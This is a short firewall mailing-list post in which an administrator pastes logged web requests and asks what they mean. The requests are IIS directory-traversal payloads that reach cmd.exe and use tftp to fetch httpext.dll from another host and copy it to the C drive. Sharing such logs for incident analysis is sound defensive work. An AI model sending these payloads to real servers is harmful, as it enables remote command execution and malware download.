We pulled this from our firewall logs recently - httpext.dll seems to be related to Code Blue, but the tftp's and the private IP's are a bit confusing - we don't have that IP on the subnet. Any ideas? Thanks. /scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir /scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+tft p+-i+192.168.11.95+get+httpext.dll /scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+cop y+httpext.dll+c:\ /scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+tft p+-i+192.168.11.95+get+httpext.dll /scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+cop y+httpext.dll+c:\ /scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+tft p+-i+192.168.11.95+get+httpext.dll /scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+cop y+httpext.dll+c:\ John J. Steniger _______________________________________________ Firewalls mailing list [EMAIL PROTECTED] http://lists.gnac.net/mailman/listinfo/firewalls
